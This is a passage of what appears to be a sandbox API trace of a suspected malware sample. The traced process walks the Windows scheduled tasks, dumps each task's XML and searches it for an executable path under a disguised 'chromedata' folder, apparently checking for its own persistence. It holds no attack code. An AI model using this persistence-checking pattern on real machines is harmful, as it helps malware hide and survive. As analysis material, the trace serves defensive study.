	[0073.139] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\acproxy.dll,-100)</Source>\r\n    <Author>$(@%systemroot%\\system32\\acproxy.dll,-101)</Author>\r\n    <Description>$(@%systemroot%\\system32\\acproxy.dll,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Autochk\\Proxy</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"AutochkProxy\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT31536000S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d acproxy.dll,PerformAutochkOperations</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.140] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.140] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.140] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe50) returned 0x0
	[0073.140] ITaskFolderCollection:get_Count (in: This=0x55fe50, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.140] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.140] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.140] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x5, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.140] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe58) returned 0x0
	[0073.141] IRegisteredTaskCollection:get_Count (in: This=0x55fe58, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.141] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.141] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="UninstallDeviceTask") returned 0x0
	[0073.141] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>BthUdTask.exe</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.142] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>BthUdTask.exe</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.143] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.143] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.143] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe58) returned 0x0
	[0073.143] ITaskFolderCollection:get_Count (in: This=0x55fe58, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.143] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.143] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.143] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x6, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.143] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe78) returned 0x0
	[0073.144] IRegisteredTaskCollection:get_Count (in: This=0x55fe78, pCount=0x128e30 | out: pCount=0x128e30*=3) returned 0x0
	[0073.144] IRegisteredTaskCollection:get_Item (in: This=0x55fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff80) returned 0x0
	[0073.144] IRegisteredTask:get_Name (in: This=0x55ff80, pName=0x128e3c | out: pName=0x128e3c*="SystemTask") returned 0x0
	[0073.144] IRegisteredTask:get_Xml (in: This=0x55ff80, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\SystemTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n                &lt;Query Id=\"0\" Path=\"System\"&gt;\r\n                    &lt;Select Path=\"System\"&gt;\r\n                        *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n                    &lt;/Select&gt;\r\n                &lt;/Query&gt;\r\n                &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <BootTrigger>\r\n      <Delay>PT10S</Delay>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0073.146] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\SystemTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n                &lt;Query Id=\"0\" Path=\"System\"&gt;\r\n                    &lt;Select Path=\"System\"&gt;\r\n                        *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n                    &lt;/Select&gt;\r\n                &lt;/Query&gt;\r\n                &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <BootTrigger>\r\n      <Delay>PT10S</Delay>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.146] IUnknown:Release (This=0x55ff80) returned 0x0
	[0073.146] IRegisteredTaskCollection:get_Item (in: This=0x55fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff80) returned 0x0
	[0073.146] IRegisteredTask:get_Name (in: This=0x55ff80, pName=0x128e3c | out: pName=0x128e3c*="UserTask") returned 0x0
	[0073.146] IRegisteredTask:get_Xml (in: This=0x55ff80, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <LogonTrigger>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[USER]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0073.148] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <LogonTrigger>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[USER]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.148] IUnknown:Release (This=0x55ff80) returned 0x0
	[0073.148] IRegisteredTaskCollection:get_Item (in: This=0x55fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff80) returned 0x0
	[0073.149] IRegisteredTask:get_Name (in: This=0x55ff80, pName=0x128e3c | out: pName=0x128e3c*="UserTask-Roam") returned 0x0
	[0073.149] IRegisteredTask:get_Xml (in: This=0x55ff80, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionLock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionUnlock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[KEYROAMING]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0073.151] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionLock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionUnlock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[KEYROAMING]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.151] IUnknown:Release (This=0x55ff80) returned 0x0
	[0073.151] IUnknown:Release (This=0x55fe78) returned 0x0
	[0073.151] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe78) returned 0x0
	[0073.152] ITaskFolderCollection:get_Count (in: This=0x55fe78, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.152] IUnknown:Release (This=0x55fe78) returned 0x0
	[0073.152] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.152] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x7, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.152] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe90) returned 0x0
	[0073.153] IRegisteredTaskCollection:get_Count (in: This=0x55fe90, pCount=0x128e30 | out: pCount=0x128e30*=3) returned 0x0
	[0073.153] IRegisteredTaskCollection:get_Item (in: This=0x55fe90, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff30) returned 0x0
	[0073.153] IRegisteredTask:get_Name (in: This=0x55ff30, pName=0x128e3c | out: pName=0x128e3c*="Consolidator") returned 0x0
	[0073.153] IRegisteredTask:get_Xml (in: This=0x55ff30, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator</URI>\r\n    <Source>$(@%systemRoot%\\system32\\wsqmcons.exe,-106)</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>$(@%systemRoot%\\system32\\wsqmcons.exe,-107)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2004-01-02T00:00:00</StartBoundary>\r\n      <Repetition>\r\n        <Interval>PT19H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"WinSQMAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"WinSQMAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\wsqmcons.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.155] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator</URI>\r\n    <Source>$(@%systemRoot%\\system32\\wsqmcons.exe,-106)</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>$(@%systemRoot%\\system32\\wsqmcons.exe,-107)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2004-01-02T00:00:00</StartBoundary>\r\n      <Repetition>\r\n        <Interval>PT19H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"WinSQMAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"WinSQMAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\wsqmcons.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.155] IUnknown:Release (This=0x55ff30) returned 0x0
